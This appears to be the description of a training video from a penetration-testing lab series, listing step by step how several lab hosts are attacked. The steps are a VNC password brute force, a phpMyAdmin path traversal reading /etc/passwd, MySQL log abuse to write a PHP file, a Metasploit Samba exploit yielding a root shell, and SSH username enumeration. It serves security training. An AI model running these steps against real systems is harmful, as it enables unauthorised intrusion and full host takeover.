Project 51 - Exploiting Legacy Versions of Protocols

Описание: Commands Used/Steps Taken (in the order that they appear in the video):

1. cd Exploiting-Public-Facing-App (to change to the directory that our python script located)

2. python3 brutedum.py (to run BruteDum)

3. Target Host: localhost, Nmap scan: y, Protocol to brute force: 6 (VNC), Use Hydra: 2

4. Top207-probable-v2.txt (word list to use)

5. Run on default port: n, run on port 5901 (we have our on intel that VNC is running on an alternate port)

6. Looks like we found a password: 123456

7. Open a browser and go to http://192.168.1.101/phpmyadmin

8. Enter this into the browser: http://192.168.1.101/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

9. Click on "SQL" tab at the top, enter in SHOW VARIABLES LIKE 'general%' ; (and click Go)

10. Click on "SQL" tab at the top, enter in SET GLOBAL general_log= 'on' (to set the general log to ON),

11. Click on "SQL" tab at the top, enter in SET GLOBAL general_log_file= '1.php' (to change the log file to 1.php)

12. Click on "SQL" tab at the top, enter in SHOW VARIABLES LIKE 'general%' ; (to verify the changes)

13. Click on "SQL" tab at the top, enter in select '?php phpinfo();?' (to generate new 1.php file)

14. nmap -sC -sV samba (to nmap scan host name "samba", take note of the host name)

15. We can see that ports 22, 80, and 445 are all open on the device

16. msfconsole (to start Metasploit framework)

17. search smb_version (to look for auxiliary or exploit utility)

18. use auxiliary/scanner/smb/smb_version (to choose tool to use)

19. set RHOSTS 192.168.1.101 (to set our remote host to the target machine)

20. exploit (to run)

21. Metasploit tells us that the host is running Samba 4.3.8-Ubuntu

22. use exploit/linux/samba/is_known_pipename (to use a module that triggers an arbitrary shared library load vulnerability in this Samba version)

23. set RHOST 192.168.1.101

24. set SMB::AlwaysEncrypt false

25. set SMB::ProtocolVersion 1

26. exploit

27. (no prompt of successful entry will appear) id

28. We can see that we now have a root session on the target host

29. Ctrl + C to end shell session and exit to quit Metasploit

30. nmap -sV -p22 192.168.1.102 (to run a nmap scan against port 22 of target host)

31. We can see that its running OpenSSH 6.7p1 on port 22 of the target and falls within range of the exploitable versions

32. nano usernames.txt (to create a username list with the text editor)

33. chmod +x ssh_enum.py (to make python script we will be using executable)

34. python3 ssh_enum.py 192.168.1.102 -w usernames.txt greater than valid.txt (to run the python script with our username list and save the output to a new doc)

35. cat valid.txt (to display the contents of the new output file)

36. ^ We can see that admin is a valid username